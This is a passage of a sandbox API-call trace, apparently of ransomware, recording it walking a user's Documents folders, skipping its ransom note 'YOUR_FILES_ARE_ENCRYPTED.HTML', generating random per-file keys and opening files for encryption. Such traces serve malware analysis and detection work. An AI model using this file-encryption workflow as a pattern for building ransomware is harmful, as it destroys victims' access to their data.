[0166.592] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E0") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="72") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F6") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0E") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DC") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="07") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="2B") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="BB") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="D0") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="07") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="66") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EB") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="96") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DC") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="25") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3F") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4C") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="7B") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="8E") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B4") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E5") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="E5") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="76") returned 2 [0166.592] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3E") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="13") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9A") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F3") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="71") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="2B") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E9") returned 2 [0166.593] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="14") returned 2 [0166.593] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt" [0166.593] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.593] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.606] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d2facb0, ftCreationTime.dwHighDateTime=0x1d7dca8, ftLastAccessTime.dwLowDateTime=0xcef78710, ftLastAccessTime.dwHighDateTime=0x1d7e5ec, ftLastWriteTime.dwLowDateTime=0xcef78710, ftLastWriteTime.dwHighDateTime=0x1d7e5ec, nFileSizeHigh=0x0, nFileSizeLow=0x132d7, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="8X9WjuuzW6SgBw9jG.pdf", cAlternateFileName="8X9WJU~1.PDF")) returned 1 [0166.606] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf") returned 66 [0166.606] lstrcmpW (lpString1="8X9WjuuzW6SgBw9jG.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.606] PathFindExtensionW (pszPath="8X9WjuuzW6SgBw9jG.pdf") returned=".pdf" [0166.606] lstrlenW (lpString=".pdf") returned 4 [0166.606] PathFindExtensionW (pszPath="8X9WjuuzW6SgBw9jG.pdf") returned=".pdf" [0166.606] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\8x9wjuuzw6sgbw9jg.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.607] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=78551) returned 1 [0166.607] GetProcessHeap () returned 0x270000 [0166.607] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.608] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AF") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0B") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C8") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="89") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="23") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FF") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C3") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CA") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B6") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="E4") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AA") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D1") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7D") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F1") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="23") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0F") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="77") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AE") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9D") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="08") returned 2 [0166.608] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="FE") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="0E") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="03") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A9") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="91") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="98") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="40") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="2F") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="87") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D4") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="06") returned 2 [0166.609] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="61") returned 2 [0166.610] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf" [0166.610] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.610] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.618] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbabc940, ftCreationTime.dwHighDateTime=0x1d7e269, ftLastAccessTime.dwLowDateTime=0xdcbcebf0, ftLastAccessTime.dwHighDateTime=0x1d7e287, ftLastWriteTime.dwLowDateTime=0xdcbcebf0, ftLastWriteTime.dwHighDateTime=0x1d7e287, nFileSizeHigh=0x0, nFileSizeLow=0x4286, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="auji kIm2DapmjjR1s1D.pdf", cAlternateFileName="AUJIKI~1.PDF")) returned 1 [0166.618] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf") returned 69 [0166.619] lstrcmpW (lpString1="auji kIm2DapmjjR1s1D.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.619] PathFindExtensionW (pszPath="auji kIm2DapmjjR1s1D.pdf") returned=".pdf" [0166.619] lstrlenW (lpString=".pdf") returned 4 [0166.619] PathFindExtensionW (pszPath="auji kIm2DapmjjR1s1D.pdf") returned=".pdf" [0166.619] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\auji kim2dapmjjr1s1d.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.620] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=17030) returned 1 [0166.620] GetProcessHeap () returned 0x270000 [0166.620] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.621] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AD") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="03") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="82") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="A6") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="19") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="19") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="59") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="AA") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="97") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="44") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7D") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="13") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="51") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E5") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E1") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="AB") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="BB") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9D") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="8F") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="45") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="45") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3C") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="84") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="89") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="43") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="30") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3C") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="74") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="45") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="82") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A9") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="18") returned 2 [0166.623] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf" [0166.623] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.623] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.630] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x143c2bf0, ftCreationTime.dwHighDateTime=0x1d7e214, ftLastAccessTime.dwLowDateTime=0xc1362c00, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xc1362c00, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="f JTmrxPq5", cAlternateFileName="FJTMRX~1")) returned 1 [0166.630] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5") returned 55 [0166.630] GetProcessHeap () returned 0x270000 [0166.630] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0166.630] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5" [0166.630] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\*" [0166.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x143c2bf0, ftCreationTime.dwHighDateTime=0x1d7e214, ftLastAccessTime.dwLowDateTime=0xc1362c00, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xc1362c00, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0166.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x143c2bf0, ftCreationTime.dwHighDateTime=0x1d7e214, ftLastAccessTime.dwLowDateTime=0xc1362c00, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xc1362c00, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0166.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaa0d3b0, ftCreationTime.dwHighDateTime=0x1d7e6ae, ftLastAccessTime.dwLowDateTime=0x293a7f70, ftLastAccessTime.dwHighDateTime=0x1d7e6ce, ftLastWriteTime.dwLowDateTime=0x293a7f70, ftLastWriteTime.dwHighDateTime=0x1d7e6ce, nFileSizeHigh=0x0, nFileSizeLow=0xb871, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="AkyUOHSiqSLINrjDCfZ.ots", cAlternateFileName="AKYUOH~1.OTS")) returned 1 [0166.633] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\AkyUOHSiqSLINrjDCfZ.ots") returned 79 [0166.633] lstrcmpW (lpString1="AkyUOHSiqSLINrjDCfZ.ots", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.634] PathFindExtensionW (pszPath="AkyUOHSiqSLINrjDCfZ.ots") returned=".ots" [0166.634] lstrlenW (lpString=".ots") returned 4 [0166.634] PathFindExtensionW (pszPath="AkyUOHSiqSLINrjDCfZ.ots") returned=".ots" [0166.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77ff8c0, ftCreationTime.dwHighDateTime=0x1d7dcd0, ftLastAccessTime.dwLowDateTime=0x6fed4830, ftLastAccessTime.dwHighDateTime=0x1d7e061, ftLastWriteTime.dwLowDateTime=0x6fed4830, ftLastWriteTime.dwHighDateTime=0x1d7e061, nFileSizeHigh=0x0, nFileSizeLow=0x5c58, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="hTZUPdS9n1aSQ.rtf", cAlternateFileName="HTZUPD~1.RTF")) returned 1 [0166.634] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf") returned 73 [0166.634] lstrcmpW (lpString1="hTZUPdS9n1aSQ.rtf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.634] PathFindExtensionW (pszPath="hTZUPdS9n1aSQ.rtf") returned=".rtf" [0166.634] lstrlenW (lpString=".rtf") returned 4 [0166.634] PathFindExtensionW (pszPath="hTZUPdS9n1aSQ.rtf") returned=".rtf" [0166.634] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\htzupds9n1asq.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.635] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=23640) returned 1 [0166.635] GetProcessHeap () returned 0x270000 [0166.635] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.636] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="49") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="34") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="48") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B6") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A2") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="8B") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="0A") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="45") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E9") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A1") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="9E") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="03") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="AE") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="AC") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="B0") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B3") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="6E") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B9") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="13") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="CB") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="5D") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A0") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C9") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="55") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="78") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4A") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2F") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="1E") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="DD") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8F") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="9B") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="7D") returned 2 [0166.638] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf" [0166.638] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.638] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.647] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98441430, ftCreationTime.dwHighDateTime=0x1d7d80a, ftLastAccessTime.dwLowDateTime=0x29386c00, ftLastAccessTime.dwHighDateTime=0x1d7e33e, ftLastWriteTime.dwLowDateTime=0x29386c00, ftLastWriteTime.dwHighDateTime=0x1d7e33e, nFileSizeHigh=0x0, nFileSizeLow=0xe01b, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="iZSQPfkU9OoDlqQRm.rtf", cAlternateFileName="IZSQPF~1.RTF")) returned 1 [0166.647] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf") returned 77 [0166.647] lstrcmpW (lpString1="iZSQPfkU9OoDlqQRm.rtf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.647] PathFindExtensionW (pszPath="iZSQPfkU9OoDlqQRm.rtf") returned=".rtf" [0166.647] lstrlenW (lpString=".rtf") returned 4 [0166.647] PathFindExtensionW (pszPath="iZSQPfkU9OoDlqQRm.rtf") returned=".rtf" [0166.647] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\izsqpfku9oodlqqrm.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.648] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=57371) returned 1 [0166.648] GetProcessHeap () returned 0x270000 [0166.648] RtlAllocateHeap (HeapHandle=0x270000, 